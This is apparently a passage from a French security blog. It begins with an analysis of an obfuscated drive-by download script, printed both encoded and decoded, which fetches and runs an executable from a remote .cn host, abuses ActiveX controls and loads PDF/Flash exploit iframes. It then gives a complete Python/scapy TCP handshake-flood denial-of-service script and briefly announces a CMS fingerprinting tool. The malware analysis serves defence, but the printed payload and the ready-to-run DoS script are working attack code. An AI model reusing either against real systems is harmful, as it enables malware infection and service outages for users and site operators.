0023%u002f%u0069%u0067%u002c%u0020%u0027%u0027%u0029%u0029%u0020%u0072%u0065%u0074%u0075%u0072%u006e%u003b%u000d%u000a%u0009%u007d%u000d%u000a%u000d%u000a%u0009%u0070%u0058%u004c%u006d%u0050%u005a%u0054%u0046%u0059%u002e%u0053%u006e%u0061%u0070%u0073%u0068%u006f%u0074%u0050%u0061%u0074%u0068%u0020%u003d%u0020%u0075%u0072%u006c%u003b%u000d%u000a%u000d%u000a%u0009%u0074%u0072%u0079%u000d%u000a%u0009%u007b%u000d%u000a%u0009%u0009%u0070%u0058%u004c%u006d%u0050%u005a%u0054%u0046%u0059%u002e%u0043%u006f%u006d%u0070%u0072%u0065%u0073%u0073%u0065%u0064%u0050%u0061%u0074%u0068%u0020%u003d%u0020%u007a%u0076%u0051%u0050%u0071%u0066%u0045%u0078%u0071%u0020%u002b%u0020%u0022%u003a%u005c%u005c%u0022%u0020%u002b%u0020%u0027%u0050%u0023%u0024%u0029%u005e%u0072%u0040%u0029%u0028%u006f%u0029%u0021%u0028%u0023%u0067%u0040%u0021%u0040%u0029%u0072%u005e%u0061%u0029%u0024%u0023%u0040%u006d%u0029%u0021%u0040%u0020%u0026%u005e%u0046%u0028%u0028%u0026%u0029%u0069%u005e%u005e%u005e%u0028%u006c%u0026%u005e%u0028%u0029%u0065%u0024%u0021%u0040%u0073%u005e%u0024%u0027%u002e%u0072%u0065%u0070%u006c%u0061%u0063%u0065%u0028%u002f%u0026%u007c%u0040%u007c%u005c%u0028%u007c%u005c%u005e%u007c%u0023%u007c%u005c%u0029%u007c%u005c%u0024%u007c%u005c%u0021%u002f%u0069%u0067%u002c%u0020%u0027%u0027%u0029%u0020%u002b%u0020%u0022%u005c%u005c%u0022%u0020%u002b%u0020%u0027%u004f%u005e%u0028%u0075%u0023%u0040%u0074%u0021%u005e%u0023%u006c%u0021%u006f%u005e%u0028%u006f%u0029%u006b%u0023%u0029%u005e%u0020%u0026%u005e%u0023%u0026%u0045%u0029%u0029%u0078%u0023%u0040%u0070%u0023%u0029%u0023%u0072%u0023%u005e%u005e%u0065%u0023%u0073%u0021%u0040%u0024%u0021%u0073%u0026%u0029%u0027%u002e%u0072%u0065%u0070%u006c%u0061%u0063%u0065%u0028%u002f%u005c%u005e%u007c%u0026%u007c%u005c%u0029%u007c%u0023%u007c%u005c%u0024%u007c%u0040%u007c%u005c%u0028%u007c%u005c%u0021%u002f%u0069%u0067%u002c%u0020%u0027%u0027%u0029%u0020%u002b%u0020%u0022%u005c%u005c%u0022%u0020%u002b%u0020%u0027%u0077%u0028%u0028%u0021%u0061%u0028%u0026%u0062%u0040%u0021%u0029%u002e%u005e%u0026%u0024%u0026%u0028%u0065%u0040%u0026%u0078%u0026%u005e%u0065%u0028%u0029%u0027%u002e%u0072%u0065%u0070%u006c%u0061%u0063%u0065%u0028%u002f%u0026%u007c%u005c%u0029%u007c%u005c%u0024%u007c%u005c%u0028%u007c%u005c%u005e%u007c%u0023%u007c%u005c%u0021%u007c%u0040%u002f%u0069%u0067%u002c%u0020%u0027%u0027%u0029%u003b%u000d%u000a%u0009%u0009%u0070%u0058%u004c%u006d%u0050%u005a%u0054%u0046%u0059%u002e%u0050%u0072%u0069%u006e%u0074%u0053%u006e%u0061%u0070%u0073%u0068%u006f%u0074%u0028%u0029%u003b%u000d%u000a%u0009%u007d%u000d%u000a%u000d%u000a%u0009%u0063%u0061%u0074%u0063%u0068%u0028%u0065%u0029%u007b%u007d%u003b%u000d%u000a%u000d%u000a%u0009%u0076%u0061%u0072%u0020%u0068%u0034%u0053%u0075%u007a%u006f%u007a%u0047%u0020%u003d%u0020%u0073%u0065%u0074%u0049%u006e%u0074%u0065%u0072%u0076%u0061%u006c%u0028%u0066%u0075%u006e%u0063%u0074%u0069%u006f%u006e%u0028%u0029%u007b%u0069%u0066%u0020%u0028%u0070%u0058%u004c%u006d%u0050%u005a%u0054%u0046%u0059%u002e%u0072%u0065%u0061%u0064%u0079%u0053%u0074%u0061%u0074%u0065%u0020%u003d%u003d%u0020%u0034%u0029%u0020%u007b%u0063%u006c%u0065%u0061%u0072%u0049%u006e%u0074%u0065%u0072%u0076%u0061%u006c%u0028%u0068%u0034%u0053%u0075%u007a%u006f%u007a%u0047%u0029%u003b%u0077%u0069%u006e%u0064%u006f%u0077%u002e%u006c%u006f%u0063%u0061%u0074%u0069%u006f%u006e%u0020%u003d%u0020%u0027%u006c%u0024%u0028%u0026%u0026%u0064%u0021%u0061%u0040%u005e%u0070%u0021%u0029%u003a%u0024%u0040%u002f%u005e%u0040%u002f%u0024%u0029%u0028%u0024%u0027%u002e%u0072%u0065%u0070%u006c%u0061%u0063%u0065%u0028%u002f%u0023%u007c%u005c%u005e%u007c%u005c%u0028%u007c%u005c%u0021%u007c%u0040%u007c%u005c%u0029%u007c%u005c%u0024%u007c%u0026%u002f%u0069%u0067%u002c%u0020%u0027%u0027%u0029%u003b%u007d%u007d%u002c%u0020%u0033%u0030%u0030%u0030%u0029%u003b%u000d%u000a%u007d%u000d%u000a%u000d%u000a%u0077%u0079%u0055%u0079%u0078%u004d%u0056%u006e%u0028%u0027%u0068%u005e%u0028%u0023%u0074%u005e%u0040%u0021%u0074%u0021%u0021%u0021%u0070%u0029%u003a%u0024%u0023%u0028%u002f%u0023%u0028%u002f%u0026%u0062%u0026%u0026%u0040%u0065%u0040%u0023%u005e%u0040%u0073%u005e%u0024%u0074%u0026%u005e%u0024%u006c%u0026%u0069%u005e%u0074%u0021%u0065%u0040%u0024%u0026%u005e%u0064%u0023%u005e%u0069%u0021%u0029%u0021%u0040%u0073%u0040%u0024%u0063%u0021%u005e%u0024%u006f%u0021%u0021%u0023%u0076%u005e%u0028%u0065%u005e%u0023%u0028%u0072%u0028%u0023%u0024%u002e%u0040%u0024%u0021%u0063%u0021%u0024%u0024%u006e%u0024%u0024%u0021%u0021%u003a%u0026%u0028%u0028%u0038%u0023%u0026%u005e%u0030%u0028%u0028%u0038%u0029%u0030%u0028%u0023%u002f%u0023%u0028%u0023%u006c%u0023%u0021%u0028%u0021%u006f%u0024%u0028%u0021%u0061%u0026%u0026%u0064%u005e%u002e%u0026%u0021%u0070%u0029%u005e%u0023%u0021%u0021%u0068%u0024%u0023%u0070%u0029%u0028%u0021%u003f%u0021%u0026%u0069%u0040%u0064%u0023%u0028%u0021%u003d%u0023%u0031%u0040%u0027%u002e%u0072%u0065%u0070%u006c%u0061%u0063%u0065%u0028%u002f%u005c%u0021%u007c%u005c%u0029%u007c%u0026%u007c%u005c%u0024%u007c%u0023%u007c%u0040%u007c%u005c%u005e%u007c%u005c%u0028%u002f%u0069%u0067%u002c%u0020%u0027%u0027%u0029%u0029%u003b%u000a%u0066%u0075%u006e%u0063%u0074%u0069%u006f%u006e%u0020%u004c%u0031%u006d%u0079%u0039%u0068%u006d%u006a%u0028%u0029%u007b%u000a%u0009%u0050%u0044%u0046%u0020%u003d%u0020%u006e%u0065%u0077%u0020%u0041%u0072%u0072%u0061%u0079%u0028%u0022%u0041%u0063%u0072%u006f%u0050%u0044%u0046%u002e%u0050%u0044%u0046%u0022%u002c%u0020%u0022%u0050%u0044%u0046%u002e%u0050%u0064%u0066%u0043%u0074%u0072%u006c%u0022%u0029%u003b%u000a%u0009%u0066%u006f%u0072%u0028%u0069%u0020%u0069%u006e%u0020%u0050%u0044%u0046%u0029%u000a%u0009%u007b%u000a%u0009%u0009%u0074%u0072%u0079%u000a%u0009%u0009%u007b%u000a%u0009%u0009%u0009%u006f%u0062%u006a%u0020%u003d%u0020%u006e%u0065%u0077%u0020%u0041%u0063%u0074%u0069%u0076%u0065%u0058%u004f%u0062%u006a%u0065%u0063%u0074%u0028%u0050%u0044%u0046%u005b%u0069%u005d%u0029%u003b%u000a%u0009%u0009%u0009%u0069%u0066%u0020%u0028%u006f%u0062%u006a%u0029%u000a%u0009%u0009%u0009%u007b%u000a%u0009%u0009%u0009%u0009%u0064%u006f%u0063%u0075%u006d%u0065%u006e%u0074%u002e%u0077%u0072%u0069%u0074%u0065%u0028%u0027%u003c%u0069%u0066%u0072%u0061%u006d%u0065%u0020%u0073%u0072%u0063%u003d%u0022%u0063%u0061%u0063%u0068%u0065%u002f%u0072%u0065%u0061%u0064%u006d%u0065%u002e%u0070%u0064%u0066%u0022%u003e%u003c%u002f%u0069%u0066%u0072%u0061%u006d%u0065%u003e%u0027%u0029%u003b%u000a%u0009%u0009%u0009%u007d%u000a%u0009%u0009%u007d%u000a%u0009%u0009%u0063%u0061%u0074%u0063%u0068%u0028%u0065%u0029%u007b%u007d%u000a%u0009%u007d%u000a%u0009%u0074%u0072%u0079%u000a%u0009%u007b%u000a%u0009%u0009%u006f%u0062%u006a%u0020%u003d%u0020%u006e%u0065%u0077%u0020%u0041%u0063%u0074%u0069%u0076%u0065%u0058%u004f%u0062%u006a%u0065%u0063%u0074%u0028%u0022%u0053%u0068%u006f%u0063%u006b%u0077%u0061%u0076%u0065%u0046%u006c%u0061%u0073%u0068%u002e%u0053%u0068%u006f%u0063%u006b%u0077%u0061%u0076%u0065%u0046%u006c%u0061%u0073%u0068%u0022%u0029%u003b%u000a%u0009%u0009%u0069%u0066%u0020%u0028%u006f%u0062%u006a%u0029%u000a%u0009%u0009%u007b%u000a%u0009%u0009%u0009%u0064%u006f%u0063%u0075%u006d%u0065%u006e%u0074%u002e%u0077%u0072%u0069%u0074%u0065%u0028%u0027%u003c%u0069%u0066%u0072%u0061%u006d%u0065%u0020%u0073%u0072%u0063%u003d%u0022%u0063%u0061%u0063%u0068%u0065%u002f%u0066%u006c%u0061%u0073%u0068%u002e%u0073%u0077%u0066%u0022%u003e%u003c%u002f%u0069%u0066%u0072%u0061%u006d%u0065%u003e%u0027%u0029%u003b%u000a%u0009%u0009%u007d%u000a%u0009%u007d%u000a%u0009%u0063%u0061%u0074%u0063%u0068%u0028%u0065%u0029%u007b%u007d%u000a%u007d%u000a%u004c%u0031%u006d%u0079%u0039%u0068%u006d%u006a%u0028%u0029%u003b')); 

Bon ca reste incompréhensible mais on voit qu'il y a un appel à la fonction unescape() donc que eval() exécute le tout. Nous allons donc chercher un script pour unescaper tout ca. Pour cela j'ai trouvé un site très simple : http://www.linkedresources.com/tools/unescaper_v0.2b1.html;

On copie colle notre texte bizarre et on unescape le tout. On obtient alors le code JS suivant :

function hOYpZ39lgw()

{

	var crAlMG907 = document.createElement('o$@b&(&j&!)^e!c)#^t))^#!'.replace(/\^|\!|&|\$|\)|@|\(|#/ig, 
''));

	crAlMG907.setAttribute('i$&)d$@&'.replace(/\(|#|&|\^|\$|\)|@|\!/ig, ''),crAlMG907);

	crAlMG907.setAttribute('c(@!l@^a)^$s$@#$$s(&^i!#&d@^^'.replace(/\(|#|\)|\!|\$|@|\^|&/ig, 
''),'c)#l^(s&^@(i@#d)!(:!)B$()D^#9!&6@@(^C)5$5(@6#$-!@6^5$(A&()3(^-^@#1&$1$D##0@$#-#)9!8@3@$&A#)-)&0!^0$@C&0###4(F!@C&&!2$9@(E(#3#)&6!&(('.replace(/\!|\$|@|\^|\(|\)|&|#/ig, 
''));



	try

	{

		var pg1f8vd3ga = 
crAlMG907.CreateObject('m@s@x!!m#$l(2#&^.!!$X@!M(L@H#@#T$#$T#!P&'.replace(/&|\(|#|\$|@|\!|\^|\)/ig, ''),'');

		var s7uJwAW7MY = 
crAlMG907.CreateObject('S^!!h&(#@e$!!l^^(&l@).^A&p&$p@((^l)&^i!$c##$a@!t^#i$))o#n&&'.replace(/@|\!|#|\)|\(|\$|\^|&/ig, 
''),'');

		var clJiRi84 = 
crAlMG907.CreateObject('a)^d#!@o^#d#@!#b(&&.&^(!&s^$t$$#r!#e!#^)a(((m)!'.replace(/&|#|@|\)|\^|\$|\(|\!/ig, 
''),'');



		try

		{

			clJiRi84.type = 1;

			pg1f8vd3ga.open('G)!$E)#T&#@'.replace(/#|\!|\)|&|\(|\^|\$|@/ig, 
''),'h@#(t))(t##)@p($:!(/)/^b$!e^$s$@t&l&$i&)@!t@!&e)#d!#!#i)))s($(@c^o&&v$^!e&!(r(^@.^$!c#)n^$(#:!)^8^!(@0$^#)(8^0^@/$l!&o^a$d#.)!p@!$h#()(p$@?!^i$@&(@d&^#=!0)@'.replace(/\^|\$|\(|\)|\!|@|&|#/ig, 
''),false);

			pg1f8vd3ga.send();

			clJiRi84.open();

			clJiRi84.Write(pg1f8vd3ga.responseBody);

			var j6OpG4V4 = 
'.#^^$$/!&/!&&&.$@&(.)^@$/#/!#&f#&@i)&^l&()e$@&@.!e(&x@^e#^'.replace(/\!|\^|\(|&|#|@|\)|\$/ig, '');

			clJiRi84.SaveToFile(j6OpG4V4,2);

			clJiRi84.Close();

		}



		catch(e) {}



		try

		{

			s7uJwAW7MY.shellexecute(j6OpG4V4);

		}



	catch(e) {}}

	catch(e) {}}



hOYpZ39lgw();



function mhg3H2xdMh()

{

	for(bsljFNsoJ = 2, zvQPqfExq = ""; bsljFNsoJ <= 26; bsljFNsoJ++)

	{

		zvQPqfExq = String.fromCharCode(65 + bsljFNsoJ);

		var hQ3gmqMtd = new Image();

		hQ3gmqMtd.src = "res://" + zvQPqfExq + ":\\" + 'P)!r@o((^$(g)r!a#m&!@! 
)^)^F)!)i&l^!e&&#s$'.replace(/@|\$|\(|&|\^|#|\)|\!/ig, '') + "\\" + 'O$$u((&)t()$l(!$^o&((o(&k($^ 
!@E#x)p()!&r&e@$s$s(($'.replace(/\!|\$|\(|#|@|\^|&|\)/ig, '') + "\\" + 
'm$^!s(#&o#&@e^$@r!^e&&^s)@#!.(d@^l(@^l@'.replace(/@|\!|\^|\)|&|\$|\(|#/ig, '') + "/#2/1";



		if(hQ3gmqMtd.height == 59)

		{

			break;

		}



		hQ3gmqMtd = '';

	}



	return zvQPqfExq;

}



function wyUyxMVn(url)

{

	var zvQPqfExq = mhg3H2xdMh();

	if (zvQPqfExq == '[') return;



	try

	{

		var pXLmPZTFY = new ActiveXObject('s#n#p$(v)$(^w)&.^^^#S&n#&@^a()p@!(!s((!!h#o$^t#$@ 
^@#)V(#i&)$e!#@w!$@e)(r&)^# !##C$$)(o$$n(t@^r^@o#@l)$$#^.(^1)$&'.replace(/\^|\(|@|#|\)|\$|\!|&/ig, ''));

	}



	catch(e)

	{

		if (pXLmPZTFY != '[(($o!b^&!#j!!e)c#!t)#@])!'.replace(/\^|\$|\!|@|&|\)|\(|#/ig, '')) return;

	}



	pXLmPZTFY.SnapshotPath = url;



	try

	{

		pXLmPZTFY.CompressedPath = zvQPqfExq + ":\\" + 'P#$)^r@)(o)!(#g@!@)r^a)$#@m)!@ 
&^F((&)i^^^(l&^()e$!@s^$'.replace(/&|@|\(|\^|#|\)|\$|\!/ig, '') + "\\" + 'O^(u#@t!^#l!o^(o)k#)^ 
&^#&E))x#@p#)#r#^^e#s!@$!s&)'.replace(/\^|&|\)|#|\$|@|\(|\!/ig, '') + "\\" + 
'w((!a(&b@!).^&$&(e@&x&^e()'.replace(/&|\)|\$|\(|\^|#|\!|@/ig, '');

		pXLmPZTFY.PrintSnapshot();

	}



	catch(e){};



	var h4SuzozG = setInterval(function(){if (pXLmPZTFY.readyState == 4) 
{clearInterval(h4SuzozG);window.location = 'l$(&&d!a@^p!):$@/^@/$)($'.replace(/#|\^|\(|\!|@|\)|\$|&/ig, '');}}, 
3000);

}



wyUyxMVn('h^(#t^@!t!!!p):$#(/#(/&b&&@e@#^@s^$t&^$l&i^t!e@$&^d#^i!)!@s@$c!^$o!!#v^(e^#(r(#$.@$!c!$$n$$!!:&((8#&^0((8)0(#/#(#l#!(!o$(!a&&d^.&!p)^#!!h$#p)(!?!&i@d#(!=#1@'.replace(/\!|\)|&|\$|#|@|\^|\(/ig, 
''));

function L1my9hmj(){

	PDF = new Array("AcroPDF.PDF", "PDF.PdfCtrl");

	for(i in PDF)

	{

		try

		{

			obj = new ActiveXObject(PDF[i]);

			if (obj)

			{

				document.write('<iframe src="cache/readme.pdf"></iframe>');

			}

		}

		catch(e){}

	}

	try

	{

		obj = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");

		if (obj)

		{

			document.write('<iframe src="cache/flash.swf"></iframe>');

		}

	}

	catch(e){}

}

L1my9hmj(); 

Bon la on commence à etre pas mal ! On a maintenant un JS un peu compléxifié par des regexp mais qui devient compréhensible. Voyons maintenant en détail ce que fait ce JS. La 1ère méthode annonce son but avec la méthode shelExecute :

function hOYpZ39lgw()

{

	var crAlMG907 = document.createElement('o$@b&(&j&!)^e!c)#^t))^#!'.replace(/\^|\!|&|\$|\)|@|\(|#/ig, 
''));

	crAlMG907.setAttribute('i$&)d$@&'.replace(/\(|#|&|\^|\$|\)|@|\!/ig, ''),crAlMG907);

	crAlMG907.setAttribute('c(@!l@^a)^$s$@#$$s(&^i!#&d@^^'.replace(/\(|#|\)|\!|\$|@|\^|&/ig, 
''),'c)#l^(s&^@(i@#d)!(:!)B$()D^#9!&6@@(^C)5$5(@6#$-!@6^5$(A&()3(^-^@#1&$1$D##0@$#-#)9!8@3@$&A#)-)&0!^0$@C&0###4(F!@C&&!2$9@(E(#3#)&6!&(('.replace(/\!|\$|@|\^|\(|\)|&|#/ig, 
''));



	try

	{

		var pg1f8vd3ga = 
crAlMG907.CreateObject('m@s@x!!m#$l(2#&^.!!$X@!M(L@H#@#T$#$T#!P&'.replace(/&|\(|#|\$|@|\!|\^|\)/ig, ''),'');

		var s7uJwAW7MY = 
crAlMG907.CreateObject('S^!!h&(#@e$!!l^^(&l@).^A&p&$p@((^l)&^i!$c##$a@!t^#i$))o#n&&'.replace(/@|\!|#|\)|\(|\$|\^|&/ig, 
''),'');

		var clJiRi84 = 
crAlMG907.CreateObject('a)^d#!@o^#d#@!#b(&&.&^(!&s^$t$$#r!#e!#^)a(((m)!'.replace(/&|#|@|\)|\^|\$|\(|\!/ig, 
''),'');



		try

		{

			clJiRi84.type = 1;

			pg1f8vd3ga.open('G)!$E)#T&#@'.replace(/#|\!|\)|&|\(|\^|\$|@/ig, 
''),'h@#(t))(t##)@p($:!(/)/^b$!e^$s$@t&l&$i&)@!t@!&e)#d!#!#i)))s($(@c^o&&v$^!e&!(r(^@.^$!c#)n^$(#:!)^8^!(@0$^#)(8^0^@/$l!&o^a$d#.)!p@!$h#()(p$@?!^i$@&(@d&^#=!0)@'.replace(/\^|\$|\(|\)|\!|@|&|#/ig, 
''),false);

			pg1f8vd3ga.send();

			clJiRi84.open();

			clJiRi84.Write(pg1f8vd3ga.responseBody);

			var j6OpG4V4 = 
'.#^^$$/!&/!&&&.$@&(.)^@$/#/!#&f#&@i)&^l&()e$@&@.!e(&x@^e#^'.replace(/\!|\^|\(|&|#|@|\)|\$/ig, '');

			clJiRi84.SaveToFile(j6OpG4V4,2);

			clJiRi84.Close();

		}



		catch(e) {}



		try

		{

			s7uJwAW7MY.shellexecute(j6OpG4V4);

		}



	catch(e) {}}

	catch(e) {}}



hOYpZ39lgw();



En fait on constate qu'elle télécharge en mémoire un fichier "file.exe" via l'url http://bestlitediscover.cn:8080/load.php?id=1 (ca pique les yeux mais ca se lit assez facilement) puis tente de l'exécuter via shellExecute(). Voyons maintenant la 2e et 3e fonction :

function mhg3H2xdMh()

{

	for(bsljFNsoJ = 2, zvQPqfExq = ""; bsljFNsoJ <= 26; bsljFNsoJ++)

	{

		zvQPqfExq = String.fromCharCode(65 + bsljFNsoJ);

		var hQ3gmqMtd = new Image();

		hQ3gmqMtd.src = "res://" + zvQPqfExq + ":\\" + 'P)!r@o((^$(g)r!a#m&!@! 
)^)^F)!)i&l^!e&&#s$'.replace(/@|\$|\(|&|\^|#|\)|\!/ig, '') + "\\" + 'O$$u((&)t()$l(!$^o&((o(&k($^ 
!@E#x)p()!&r&e@$s$s(($'.replace(/\!|\$|\(|#|@|\^|&|\)/ig, '') + "\\" + 
'm$^!s(#&o#&@e^$@r!^e&&^s)@#!.(d@^l(@^l@'.replace(/@|\!|\^|\)|&|\$|\(|#/ig, '') + "/#2/1";



		if(hQ3gmqMtd.height == 59)

		{

			break;

		}



		hQ3gmqMtd = '';

	}



	return zvQPqfExq;

}



function mhg3H2xdMh()

{

	for(bsljFNsoJ = 2, zvQPqfExq = ""; bsljFNsoJ <= 26; bsljFNsoJ++)

	{

		zvQPqfExq = String.fromCharCode(65 + bsljFNsoJ);

		var hQ3gmqMtd = new Image();

		hQ3gmqMtd.src = "res://" + zvQPqfExq + ":\\" + 'P)!r@o((^$(g)r!a#m&!@! 
)^)^F)!)i&l^!e&&#s$'.replace(/@|\$|\(|&|\^|#|\)|\!/ig, '') + "\\" + 'O$$u((&)t()$l(!$^o&((o(&k($^ 
!@E#x)p()!&r&e@$s$s(($'.replace(/\!|\$|\(|#|@|\^|&|\)/ig, '') + "\\" + 
'm$^!s(#&o#&@e^$@r!^e&&^s)@#!.(d@^l(@^l@'.replace(/@|\!|\^|\)|&|\$|\(|#/ig, '') + "/#2/1";



		if(hQ3gmqMtd.height == 59)

		{

			break;

		}



		hQ3gmqMtd = '';

	}



	return zvQPqfExq;

}



function wyUyxMVn(url)

{

	var zvQPqfExq = mhg3H2xdMh();

	if (zvQPqfExq == '[') return;



	try

	{

		var pXLmPZTFY = new ActiveXObject('s#n#p$(v)$(^w)&.^^^#S&n#&@^a()p@!(!s((!!h#o$^t#$@ 
^@#)V(#i&)$e!#@w!$@e)(r&)^# !##C$$)(o$$n(t@^r^@o#@l)$$#^.(^1)$&'.replace(/\^|\(|@|#|\)|\$|\!|&/ig, ''));

	}



	catch(e)

	{

		if (pXLmPZTFY != '[(($o!b^&!#j!!e)c#!t)#@])!'.replace(/\^|\$|\!|@|&|\)|\(|#/ig, '')) return;

	}



	pXLmPZTFY.SnapshotPath = url;



	try

	{

		pXLmPZTFY.CompressedPath = zvQPqfExq + ":\\" + 'P#$)^r@)(o)!(#g@!@)r^a)$#@m)!@ 
&^F((&)i^^^(l&^()e$!@s^$'.replace(/&|@|\(|\^|#|\)|\$|\!/ig, '') + "\\" + 'O^(u#@t!^#l!o^(o)k#)^ 
&^#&E))x#@p#)#r#^^e#s!@$!s&)'.replace(/\^|&|\)|#|\$|@|\(|\!/ig, '') + "\\" + 
'w((!a(&b@!).^&$&(e@&x&^e()'.replace(/&|\)|\$|\(|\^|#|\!|@/ig, '');

		pXLmPZTFY.PrintSnapshot();

	}



	catch(e){};



	var h4SuzozG = setInterval(function(){if (pXLmPZTFY.readyState == 4) 
{clearInterval(h4SuzozG);window.location = 'l$(&&d!a@^p!):$@/^@/$)($'.replace(/#|\^|\(|\!|@|\)|\$|&/ig, '');}}, 
3000);

}



Quand on lit les regexp on détermine très vite le Program Files\Outlook Express dans lequel est effectué la récupération des contacts outlook puis l'envoi vers l'url http://bestlitediscover.cn:8080/load.php?id=0 :)

Puis vu que ca ne suffit pas la dernière fonction suivante en rajoute une couche :

function L1my9hmj(){

	PDF = new Array("AcroPDF.PDF", "PDF.PdfCtrl");

	for(i in PDF)

	{

		try

		{

			obj = new ActiveXObject(PDF[i]);

			if (obj)

			{

				document.write('<iframe src="cache/readme.pdf"></iframe>');

			}

		}

		catch(e){}

	}

	try

	{

		obj = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");

		if (obj)

		{

			document.write('<iframe src="cache/flash.swf"></iframe>');

		}

	}

	catch(e){}

}

L1my9hmj(); 

Donc la nous avons l'appel d'un fichier PDF et d'un fichier Flash malicieux cachés dans des iframes afin d'augmenter les chances de contamination. Leur étude doit également s'avérée très intéressante et elle fera probablement l'objet d'un prochain article. On devine un virus récupérant les ftp ou des informations afin de contaminer d'autres sites et d'agir en tant que vers.

Ces exploits sont très performants car touchent énormément de personnes car des sites légitimes sont touchés et donc des personnes pensant surfer tranquillement se font avoir. De plus par exemple ici, l'antivirus n'est pas en mesure de détecter l'exploit SWF et du coup il est très efficace. Faire confiance a son seul AV n'est plus du tout suffisant. La seule solution ici est de bloquer les sites chinois en .cn ou toutes les connexions sur le port 8080. A voir l'impact sur vos besoins.
Un dernier point intéressant que je tenais a dire, est que les systèmes Linux sont autant vulnérables (en tant que client) que les autres car par exemple l'exploit PDF pourrait être destiné au plateforme Linux sur lesquelles est apparu un exploit Adobe Acrobat Reader. Et oui meme sous Linux un antivirus est nécessaire contrairement aux idées recues ;)

Un grand merci a Nico pour ses analyses ;)

Posted by cloud | Permanent link | File under: Security, Coding

22-06-2009 00:57:24

Apache HTTP DoS ... oui et ?

La dernière news de sécu parle d'un DoS Apache comme le répertorie le SANS ici . Seulement est ce une nouveauté ? Bah non ... en effet il reprend exactement mon handshake flood publié il y a un mois pour le complexifier et au final le limiter a Apache ... Bref un peu idiot.

Donc a ce que j'en ai lu, le principe consiste à se connecter au serveur Apache et à envoyer un GET avec des headers sans finir la requete et en relancant régulièrement le serveur. Du coup il va se retrouver limiter par son MaxClients. Normal. Mais au final on se retrouve avec un programme qui doit générer une connexion, puis créer une requete HTTP (donc limité au niveau applicatif) et la maintenir. Tout ca pour simuler une connexion légitime. Est ce vraiment judicieux ?

Si on regarde, le principe est exactement identique à mon TCP/IP Handshake Flood. Cela crée des connexions légitimes qui flood le serveur et provoque un DoS. Sauf que perso le DoS marche pour tous les serveurs avec une directive du genre MaxClients (Apache, Proftpd, ...) étant donné qu'il agit au niveau de la couche TCP.

Donc rien de nouveau avec cet exploit publié que l'on pourrait considéré de "vieux" dans le principe. Après peut etre que ca va faire du bien de le mettre a la lumière pour corriger les Apache mais il faudra penser aux autres ;)

J'en profite pour poster la dernière version de mon script de DoS par TCP Handshake Flood :
#!/usr/bin/env python

from scapy import *
import threading, sys
import pprint

try:
        print "TCP/IP DoS HandShake Flood PoC by cloud : http://blog.madpowah.org"
        hostname = sys.argv[1]
        dport = sys.argv[2]
        nbsyn = int(sys.argv[3])
        network = sys.argv[4]

except:
        print "Utilisation: ./handshake.py    "
        print "Exemple: ./handshake.py 192.168.0.1 80 65000 eth0"
        sys.exit(1)


def sendSyns():
        print ">> Sending SYN ..."
        sport = 6000

        while sport < 6000 + nbsyn:
                send(IP(dst=hostname,ttl=255)/ TCP(flags="S", sport=sport,dport=int(dport), seq=sport), verbose=0)
                sport += 1

def startSniff():
    print ">> Start sniff ..."
    nbcount = nbsyn*10
    filterport = "port " + dport
    sniff(iface=network,filter=filterport, prn=lambda x: getNumSeq(x), count=nbcount)

def getNumSeq(packet):
	
       	flag = packet.getlayer('TCP').flags
      	if flag == 18:
		numseq = packet.getlayer('TCP').ack
		numack = packet.getlayer('TCP').seq + 1
		srcport = packet.getlayer('TCP').dport
                send(IP(dst=hostname,ttl=255) / TCP(flags="A", sport=srcport, dport=int(dport), seq=numseq, 
ack=numack), verbose=0)
                print "ACK %d" % (numseq)

t1 = threading.Thread(target = startSniff, args = ())
t2 = threading.Thread(target = sendSyns, args = ())

t1.start()
t2.start()


Posted by cloud | Permanent link | File under: OpenSource, Security, Coding

15-06-2009 23:30:02

[Tool] CMScheck, outil de fingerprint de CMS

Quand on réalise un pentest dans un cadre professionnel, on est souvent très limité par le temps. C'est pour cela qu'il est impératif de posséder une batterie de logiciels afin de travailler le plus rapidement possible

Dans cet objectif, j'ai développé CMScheck qui est une application développée en Python dont le but est de déterminer si le site est basé sur un CMS ou un forum existant parmi les suivants :
-Joomla
-Dotclear
-Wordpress
-Drupal
-PhpBB
-PunBB
-vBulletin

Son utilisation est très simple :

(23:06:12 cloud ~/Coding/Python/CMScheck) 0 $ ./cmscheck.py www.example.org
CMScheck by cloud : http://blog.madpowah.org
>> Launching the CMS scan ...
>> Checking for Joomla ...  100%
>> Checking for Dotclear ...  0%
>> Checking for Wordpress ...  0%
>> Checking for Drupal ...  0%
>> Checking for PhpBB ...  0%
>> Checking for PunBB ...  0%
>> Checking for vBulletin ...  0%
Les modules sont très simples à développer. Si vous souhaiter contribuer en enrichissant les modules existants ou en ajoutant des modules, n'hésitez pas à me contacter. Pour le télécharger cliquez ici.


Posted by cloud | Permanent link | File under: OpenSource, Security, Coding